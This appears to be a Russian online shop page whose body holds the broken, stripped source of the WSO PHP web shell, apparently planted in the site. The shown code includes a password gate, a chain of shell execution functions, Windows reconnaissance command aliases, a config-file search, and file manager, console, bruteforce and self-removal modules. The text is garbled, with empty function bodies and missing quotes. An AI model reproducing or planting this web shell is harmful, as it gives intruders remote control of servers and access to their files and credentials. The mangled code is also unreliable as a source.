Где купить Контакты
function WSOstripslashes($array) {
}
$_POST = WSOstripslashes($_POST);
die("
Password: >>
");
$os = win;
$os = nix;
@chdir($_POST[c]);
$home_cwd = str_replace("\", "/", $home_cwd);
$cwd = str_replace("\", "/", $cwd);
$cwd .= /;
$aliases = array(
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
);
$aliases = array(
);
if(empty($_POST[charset]))
global $color;
echo "" . $_SERVER[HTTP_HOST] . " - WSO " . WSO_VERSION ."
function set(a,c,p1,p2,p3,charset) {
}
function g(a,c,p1,p2,p3,charset) {
}
function a(a,c,p1,p2,p3,charset) {
}
function sr(url, params) {
}
function processReqChange() {
}
$freeSpace = @diskfreespace($GLOBALS[cwd]);
$totalSpace = @disk_total_space($GLOBALS[cwd]);
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname(r);
$kernel = @php_uname(s);
$explink = http://exploit-db.com/search/?action=search&filter_description=;
if(strpos(Linux, $kernel) !== false)
else
if(!function_exists(posix_getegid)) {
} else {
}
$cwd_links = ;
$path = explode("/", $GLOBALS[cwd]);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
}
$charsets = array(UTF-8, Windows-1251, KOI8-R, KOI8-U, cp866);
$opt_charsets = ;
foreach($charsets as $item)
$m = array(Sec. Info=>SecInfo,Files=>FilesMan,Console=>Console,Sql=>Sql,Php=>Php,String tools=>StringTools,Bruteforce=>Bruteforce,Network=>Network);
if(!empty($GLOBALS[auth_pass]))
$m[Self remove] = SelfRemove;
$menu = ;
foreach($m as $k => $v)
$drives = "";
if($GLOBALS[os] == win) {
}
echo
Uname:
User:
Php:
Hdd:
Cwd: . ($GLOBALS[os] == win?
Drives::) .
$is_writable = is_writable($GLOBALS[cwd])?" (Writeable)":" (Not writable)";
";
$out = ;
if (function_exists(exec)) {
} elseif (function_exists(passthru)) {
} elseif (function_exists(system)) {
} elseif (function_exists(shell_exec)) {
} elseif (is_resource($f = @popen($in,"r"))) {
}
return $out;
if($s >= 1073741824)
elseif($s >= 1048576)
elseif($s >= 1024)
else
if (($p & 0xC000) == 0xC000)$i = s;
elseif (($p & 0xA000) == 0xA000)$i = l;
elseif (($p & 0x8000) == 0x8000)$i = -;
elseif (($p & 0x6000) == 0x6000)$i = b;
elseif (($p & 0x4000) == 0x4000)$i = d;
elseif (($p & 0x2000) == 0x2000)$i = c;
elseif (($p & 0x1000) == 0x1000)$i = p;
else $i = u;
$i .= (($p & 0x0100) ? r : -);
$i .= (($p & 0x0080) ? w : -);
$i .= (($p & 0x0040) ? (($p & 0x0800) ? s : x ) : (($p & 0x0800) ? S : -));
$i .= (($p & 0x0020) ? r : -);
$i .= (($p & 0x0010) ? w : -);
$i .= (($p & 0x0008) ? (($p & 0x0400) ? s : x ) : (($p & 0x0400) ? S : -));
$i .= (($p & 0x0004) ? r : -);
$i .= (($p & 0x0002) ? w : -);
$i .= (($p & 0x0001) ? (($p & 0x0200) ? t : x ) : (($p & 0x0200) ? T : -));
return $i;
if (!@is_readable($f))
elseif (!@is_writable($f))
else
$path = wsoEx(which . $p);
if(!empty($path))
return false;
wsoHeader();
echo

Server security information

function wsoSecParam($n, $v) {
}
wsoSecParam(Server software, @getenv(SERVER_SOFTWARE));
wsoSecParam(Disabled PHP Functions, $GLOBALS[disable_functions]?$GLOBALS[disable_functions]:none);
wsoSecParam(Open base dir, @ini_get(open_basedir));
wsoSecParam(Safe mode exec dir, @ini_get(safe_mode_exec_dir));
wsoSecParam(Safe mode include dir, @ini_get(safe_mode_include_dir));
wsoSecParam(cURL support, function_exists(curl_version)?enabled:no);
$temp=array();
if(function_exists(mysql_get_client_info))
if(function_exists(mssql_connect))
if(function_exists(pg_connect))
if(function_exists(oci_connect))
wsoSecParam(Supported databases, implode(, , $temp));
echo
;
if($GLOBALS[os] == nix) {
} else {
}
echo ;
wsoFooter();
if(isset($_POST[ajax])) {
}
wsoHeader();
if(isset($_POST[p2]) && ($_POST[p2] == info)) {
}
echo send using AJAX
;
if(!empty($_POST[p1])) {
}
echo ;
wsoFooter();
if(!empty($_POST[p1])) {
}
echo

File manager

$dirContent = wsoScandir(isset($_POST[c])?$_POST[c]:$GLOBALS[cwd]);
global $sort;
$sort = array(name, 1);
if(!empty($_POST[p1])) {
}
function sa() {
}
$dirs = $files = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
}
$GLOBALS[sort] = $sort;
function wsoCmp($a, $b) {
}
usort($files, "wsoCmp");
usort($dirs, "wsoCmp");
$files = array_merge($dirs, $files);
$l = 0;
foreach($files as $f) {
}
echo "
wsoFooter();
if(!function_exists(hex2bin)) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists(hex2ascii)) {function hex2ascii($p){$r=;for($i=0;$i
if(!function_exists(ascii2hex)) {function ascii2hex($p){$r=;for($i=0;$i
if(!function_exists(full_urlencode)) {function full_urlencode($p){$r=;for($i=0;$i
$stringTools = array(
);
if(isset($_POST[ajax])) {
}
wsoHeader();
echo

String conversions

echo "
foreach($stringTools as $k => $v)
if(!empty($_POST[p1])) {
}
echo"

Search files:

function wsoRecursiveGlob($path) {
}
if(@$_POST[p3])
echo "

Search for hash:

wsoFooter();
if( isset($_POST[p1]) )
if(@$_POST[p2]==download) {
}
if( @$_POST[p2] == mkfile ) {
}
wsoHeader();
echo

File tools

if( !file_exists(@$_POST[p1]) ) {
}
$uid = @posix_getpwuid(@fileowner($_POST[p1]));
if(!$uid) {
} else $gid = @posix_getgrgid(@filegroup($_POST[p1]));
echo Name: .htmlspecialchars(@basename($_POST[p1])). Size: .(is_file($_POST[p1])?wsoViewSize(filesize($_POST[p1])):-). Permission: .wsoPermsColor($_POST[p1]). Owner/Group: .$uid[name]./.$gid[name].
;
echo Create time: .date(Y-m-d H:i:s,filectime($_POST[p1])). Access time: .date(Y-m-d H:i:s,fileatime($_POST[p1])). Modify time: .date(Y-m-d H:i:s,filemtime($_POST[p1])).

;
if( empty($_POST[p2]) )
if( is_file($_POST[p1]) )
else
foreach($m as $v)
echo

;
switch($_POST[p2]) {
}
echo ;
wsoFooter();
if(isset($_POST[ajax])) {
}
wsoHeader();
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
} else if(n == 40) {
}
cmds.pop();
cmds.push(cmd);
cmds.push();
cur = cmds.length-1;
echo

Console

if(!empty($_POST[p1])) {
}
echo
$
echo ;
wsoFooter();
die(bye!);
if($_POST[p1] == yes)
echo

Suicide

;
wsoFooter();
wsoHeader();
if( isset($_POST[proto]) ) {
}
echo

Bruteforce

Рейтинг@Mail.ru
Rambler's Top100

Горячие предложения

 
Shop©2004-2012